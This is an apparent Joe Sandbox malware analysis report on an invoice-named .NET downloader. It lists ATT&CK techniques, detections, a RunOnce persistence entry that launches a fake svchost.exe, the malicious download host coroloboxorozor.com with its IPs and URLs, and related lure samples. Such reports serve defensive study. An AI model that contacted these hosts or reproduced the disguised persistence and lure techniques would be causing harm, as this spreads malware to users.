Local Accounts	At (Windows)	Logon Script (Mac)	Windows Service1	Software Packing1	NTDS	Security Software Discovery211	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Process Injection112	Timestomp1	LSA Secrets	Virtualization/Sandbox Evasion23	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Registry Run Keys / Startup Folder11	Masquerading221	Cached Domain Credentials	Process Discovery3	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion23	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection112	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
CN-Invoice-XXXXX9808-19011143287989.exe	28%	Virustotal		Browse
CN-Invoice-XXXXX9808-19011143287989.exe	30%	ReversingLabs	ByteCode-MSIL.Downloader.BaseLoader
CN-Invoice-XXXXX9808-19011143287989.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	0%	ReversingLabs
C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	30%	ReversingLabs	ByteCode-MSIL.Downloader.BaseLoader

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
coroloboxorozor.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://coroloboxorozor.com/base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html	0%	Avira URL Cloud	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://coroloboxorozor.com	0%	Virustotal		Browse
http://coroloboxorozor.com	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://sectigo.com/CPS0C	0%	URL Reputation	safe
https://sectigo.com/CPS0C	0%	URL Reputation	safe
https://sectigo.com/CPS0C	0%	URL Reputation	safe
https://sectigo.com/CPS0C	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://coroloboxorozor.com/base/563CB4793425B369FD0FAF05E615CF43.html	0%	Avira URL Cloud	safe
http://coroloboxorozor.com/base/EE6EDC43DDDD18D0313D668388B5ECD3.html	0%	Avira URL Cloud	safe
http://coroloboxorozor.com/base/563CB4793425B369FD0FAF05E615CF43	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
coroloboxorozor.com	104.21.71.230	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://coroloboxorozor.com/base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html	true	Avira URL Cloud: safe	unknown
http://coroloboxorozor.com/base/563CB4793425B369FD0FAF05E615CF43.html	true	Avira URL Cloud: safe	unknown
http://coroloboxorozor.com/base/EE6EDC43DDDD18D0313D668388B5ECD3.html	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.hulu.com/do-not-sell-my-info	svchost.exe, 0000000D.00000003.777811581.0000026432D57000.00000004.00000001.sdmp	false		high
http://ocsp.sectigo.com0	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000F.00000002.941376241.00000000046E2000.00000004.00000001.sdmp	false		high
https://corp.roblox.com/contact/	svchost.exe, 0000000D.00000003.794313140.0000026432DB6000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.793944575.0000026432D83000.00000004.00000001.sdmp	false		high
https://go.micro	powershell.exe, 00000008.00000003.848557817.0000000005ADE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.roblox.com/develop	svchost.exe, 0000000D.00000003.794313140.0000026432DB6000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.793944575.0000026432D83000.00000004.00000001.sdmp	false		high
https://instagram.com/hiddencity_	svchost.exe, 0000000D.00000003.780111212.0000026432D6A000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.780227068.0000026432D8B000.00000004.00000001.sdmp	false		high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://corp.roblox.com/parents/	svchost.exe, 0000000D.00000003.794313140.0000026432DB6000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.793944575.0000026432D83000.00000004.00000001.sdmp	false		high
http://coroloboxorozor.com	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.815025294.0000000002B11000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.928658113.0000000002B91000.00000004.00000001.sdmp, svchost.exe, 0000001A.00000002.939330747.000000000304E000.00000004.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.hulu.com/ca-privacy-rights	svchost.exe, 0000000D.00000003.777811581.0000026432D57000.00000004.00000001.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hulu.com/privacy	svchost.exe, 0000000D.00000003.777811581.0000026432D57000.00000004.00000001.sdmp	false		high
http://www.g5e.com/G5_End_User_License_Supplemental_Terms	svchost.exe, 0000000D.00000003.780111212.0000026432D6A000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.780227068.0000026432D8B000.00000004.00000001.sdmp	false		high
http://www.hulu.com/terms	svchost.exe, 0000000D.00000003.777811581.0000026432D57000.00000004.00000001.sdmp	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000F.00000002.941376241.00000000046E2000.00000004.00000001.sdmp	false		high
https://sectigo.com/CPS0C	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://sectigo.com/CPS0D	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.roblox.com/info/privacy	svchost.exe, 0000000D.00000003.794313140.0000026432DB6000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.793944575.0000026432D83000.00000004.00000001.sdmp	false		high
http://www.g5e.com/termsofservice	svchost.exe, 0000000D.00000003.780111212.0000026432D6A000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.780227068.0000026432D8B000.00000004.00000001.sdmp	false		high
https://en.help.roblox.com/hc/en-us	svchost.exe, 0000000D.00000003.794313140.0000026432DB6000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.793944575.0000026432D83000.00000004.00000001.sdmp	false		high
http://www.nirsoft.net/	AdvancedRun.exe, AdvancedRun.exe, 0000000B.00000000.764051839.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.815025294.0000000002B11000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.939999983.00000000045A1000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.928658113.0000000002B91000.00000004.00000001.sdmp, svchost.exe, 0000001A.00000002.937000226.0000000002FE1000.00000004.00000001.sdmp	false		high
http://coroloboxorozor.com/base/563CB4793425B369FD0FAF05E615CF43	svchost.exe, 0000001A.00000002.937000226.0000000002FE1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.71.230	unknown	United States		13335	CLOUDFLARENETUS	true
172.67.172.17	unknown	United States		13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	355908
Start date:	22.02.2021
Start time:	09:12:32
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	CN-Invoice-XXXXX9808-19011143287989.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@28/13@3/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 5.6% (good quality ratio 4.8%) Quality average: 73.1% Quality standard deviation: 35.9%
HCA Information:	Successful, ratio: 90% Number of executed functions: 99 Number of non-executed functions: 172
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.107.3.254, 40.88.32.150, 13.107.246.254, 52.255.188.83, 92.122.145.220, 13.88.21.125, 51.104.139.180, 104.43.139.144, 13.107.4.50, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247, 51.104.144.132 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, skypedataprdcolcus16.cloudapp.net, s-ring.s-9999.s-msedge.net, t-ring.msedge.net, afdap.au.au-msedge.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, skypedataprdcoleus17.cloudapp.net, au.au-msedge.net, s-9999.s-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, au.c-0001.c-msedge.net, t-ring.t-9999.t-msedge.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:14:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce WtdedqepeLXPvCct explorer.exe "C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe"
09:14:20	API Interceptor	10x Sleep call for process: svchost.exe modified
09:14:22	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce WtdedqepeLXPvCct explorer.exe "C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe"
09:14:35	API Interceptor	1x Sleep call for process: CN-Invoice-XXXXX9808-19011143287989.exe modified
09:14:44	API Interceptor	40x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.21.71.230	Download_quotation_PR #371073.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/ABC115F63E3898678C2BE51E3DFF397C.html
	CN-Invoice-XXXXX9808-19011143287990.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/84D1B49C9212CA5D522F0AF86A906727.html
	PurchaseOrdersCSTtyres004786587.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/532020C7A3B820370CFAAC4888397C0C.html
172.67.172.17	RFQ CSDOK202040890.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/962B8237ABAE559A807528AAAFB9133F.html
	Download_quotation_PR #371073.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/ABC115F63E3898678C2BE51E3DFF397C.html
	INVOICE_47383.EXE	Get hash	malicious	Browse	coroloboxorozor.com/base/0CA40C49A5BD0132BA49F5F7E9A63CBD.html
	PurchaseOrdersCSTtyres004786587.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/532020C7A3B820370CFAAC4888397C0C.html

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
coroloboxorozor.com	RFQ CSDOK202040890.exe	Get hash	malicious	Browse	172.67.172.17
	Download_quotation_PR #371073.exe	Get hash	malicious	Browse	172.67.172.17
	CN-Invoice-XXXXX9808-19011143287990.exe	Get hash	malicious	Browse	104.21.71.230
	INVOICE_47383.EXE	Get hash	malicious	Browse	172.67.172.17
	PurchaseOrdersCSTtyres004786587.exe	Get hash	malicious	Browse	104.21.71.230

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	RE ICA 40 Sdn Bhd- Purchase Order#6769704.exe	Get hash	malicious	Browse	162.159.135.233
	CX2 RFQ.xlsm	Get hash	malicious	Browse	104.16.18.94
	D6ui5xr64I.exe	Get hash	malicious	Browse	23.227.38.74
	7lM8HxwfAm.dll	Get hash	malicious	Browse	104.20.185.68
	LcA7GaqAXC.dll	Get hash	malicious	Browse	104.20.185.68
	4FHOFKHnX8.dll	Get hash	malicious	Browse	104.20.185.68
	5N5yxttthP.dll	Get hash	malicious	Browse	104.20.185.68
	vBKmtJ58Eo.dll	Get hash	malicious	Browse	104.20.185.68
	7R29qUuJef.exe	Get hash	malicious	Browse	104.21.1.113
	RFQ-#09503.exe	Get hash	malicious	Browse	162.159.134.233
	RFQ_1101983736366355 1101938377388.exe	Get hash	malicious	Browse	162.159.130.233
	notice of arrival.xlsx	Get hash	malicious	Browse	172.67.8.238
	RFQ CSDOK202040890.exe	Get hash	malicious	Browse	172.67.172.17
	Download_quotation_PR #371073.exe	Get hash	malicious	Browse	172.67.172.17
	Drawings.xlsm	Get hash	malicious	Browse	23.227.38.74
	22-2-2021 .xlsx	Get hash	malicious	Browse	104.22.1.232
	Offer Request 6100003768.exe	Get hash	malicious	Browse	162.159.133.233
	Shipping_Document.xlsx	Get hash	malicious	Browse	104.22.1.232
	SwiftCopyTT.exe	Get hash	malicious	Browse	104.21.19.200
	Remittance copy.xlsx	Get hash	malicious	Browse	172.67.8.238
CLOUDFLARENETUS	CX2 RFQ.xlsm	Get hash	malicious	Browse	104.16.18.94
	D6ui5xr64I.exe	Get hash	malicious	Browse	23.227.38.74
	7lM8HxwfAm.dll	Get hash	malicious	Browse	104.20.185.68
	LcA7GaqAXC.dll	Get hash	malicious	Browse	104.20.185.68
	4FHOFKHnX8.dll	Get hash	malicious	Browse	104.20.185.68
	5N5yxttthP.dll	Get hash	malicious	Browse	104.20.185.68
	vBKmtJ58Eo.dll	Get hash	malicious	Browse	104.20.185.68
	7R29qUuJef.exe	Get hash	malicious	Browse	104.21.1.113
	RFQ-#09503.exe	Get hash	malicious	Browse	162.159.134.233
	RFQ_1101983736366355 1101938377388.exe	Get hash	malicious	Browse	162.159.130.233
	notice of arrival.xlsx	Get hash	malicious	Browse	172.67.8.238
	RFQ CSDOK202040890.exe	Get hash	malicious	Browse	172.67.172.17
	Download_quotation_PR #371073.exe	Get hash	malicious	Browse	172.67.172.17
	Drawings.xlsm	Get hash	malicious	Browse	23.227.38.74
	22-2-2021 .xlsx	Get hash	malicious	Browse	104.22.1.232
	Offer Request 6100003768.exe	Get hash	malicious	Browse	162.159.133.233
	Shipping_Document.xlsx	Get hash	malicious	Browse	104.22.1.232
	SwiftCopyTT.exe	Get hash	malicious	Browse	104.21.19.200
	Remittance copy.xlsx	Get hash	malicious	Browse	172.67.8.238
	CI + PL.xlsx	Get hash	malicious	Browse	172.67.8.238

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Download_quotation_PR #371073.exe	Get hash	malicious	Browse
	CN-Invoice-XXXXX9808-19011143287990.exe	Get hash	malicious	Browse
	PurchaseOrdersCSTtyres004786587.exe	Get hash	malicious	Browse
	3zKVfxhs18.exe	Get hash	malicious	Browse
	AWB783079370872.docm	Get hash	malicious	Browse
	DETALLE DE TRANSFERENCIA BANCO AGRARO DE COLOMBIA.exe	Get hash	malicious	Browse
	CN-Invoice-XXXXX9808-19011143287990.exe	Get hash	malicious	Browse
	Payment Advice 170221.exe	Get hash	malicious	Browse
	Payment Receipt.jar	Get hash	malicious	Browse
	miner.exe	Get hash	malicious	Browse
	875666665.xlsm.xlsm	Get hash	malicious	Browse
	DOCX.doc.doc	Get hash	malicious	Browse
	v.exe	Get hash	malicious	Browse
	uaa.exe	Get hash	malicious	Browse
	r.exe	Get hash	malicious	Browse
	j.exe	Get hash	malicious	Browse
	99.exe	Get hash	malicious	Browse
	m.exe	Get hash	malicious	Browse
	n.exe	Get hash	malicious	Browse
	DdV1LG7bLJ.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CN-Invoice-XXXXX9808-19011143287989.exe.log Download File
Process:	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:ML9E4Ks2wKDE4KhK3VZ9pKhIE4Ko84G1qE4qXKIE4oKFKHKoZAE4Kzr7FE4j:MxHKXwYHKhQnoIHKovG1qHitHoxHhAHY
MD5:	EA50F64CFBA8AB68863BA174B6FABB73
SHA1:	EFE6A61D221A7DDEE27271613F5FBEAE676254B1
SHA-256:	F97DFD0F7416C33888130B7A06880E3D04CB6F65DDAFCDCE72FA083B0C271711
SHA-512:	A977ABBE32AABA654D968A8C0957059E6CDFC58BD02B9A4E02E61A995578CDBA5FD26A359F09B8506C82D84156658DB22CAC57D3B83B50BD239FB62D26B512D7
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	14734
Entropy (8bit):	4.996142136926143
Encrypted:	false
SSDEEP:	384:SEdVoGIpN6KQkj2Zkjh4iUxZvuiOOdBCNXp5nYoJib4J:SYV3IpNBQkj2Yh4iUxZvuiOOdBCNZlYO
MD5:	B7D3A4EB1F0AED131A6E0EDF1D3C0414
SHA1:	A72E0DDE5F3083632B7242D2407658BCA3E54F29
SHA-256:	8E0EB5898DDF86FE9FE0011DD7AC6711BB0639A8707053D831FB348F9658289B
SHA-512:	F9367BBEC9A44E5C08757576C56B9C8637D8A0A9D6220DE925255888E6A0A088C653E207E211A6796F6A7F469736D538EA5B9E094944316CF4E8189DDD3EED9D
Malicious:	false
Preview:	PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	22308
Entropy (8bit):	5.599056451656148
Encrypted:	false
SSDEEP:	384:NtCDT0oNdT0QY2cw4+0jul6o3D7Y9gxSJUeRe1BMrmEZSRV7AjKZf64I+9g:AJ7Yfw4VClP33xXeNZAcWs
MD5:	3CA1D2A5767EA8E44BE53C55B4508377
SHA1:	36EE306B58038093AF90DC1D00FA9A88FF526359
SHA-256:	177CFA2E61AB8BF0008636E8E2856E256A097FA644714E402481E4A03B0A88C1
SHA-512:	2653DA30F52CD0AA9D4F9FCEF314E813D435263AEA2B20117FD7B38882AD90ABAC2BFFA2F6CD91B4A4124047C17C7731862EAAF8915F2241313B474476D732E7
Malicious:	false
Preview:	@...e.....................%.............,............@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe Download File
Process:	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91000
Entropy (8bit):	6.241345766746317
Encrypted:	false
SSDEEP:	1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
MD5:	17FC12902F4769AF3A9271EB4E2DACCE
SHA1:	9A4A1581CC3971579574F837E110F3BD6D529DAB
SHA-256:	29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
SHA-512:	036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
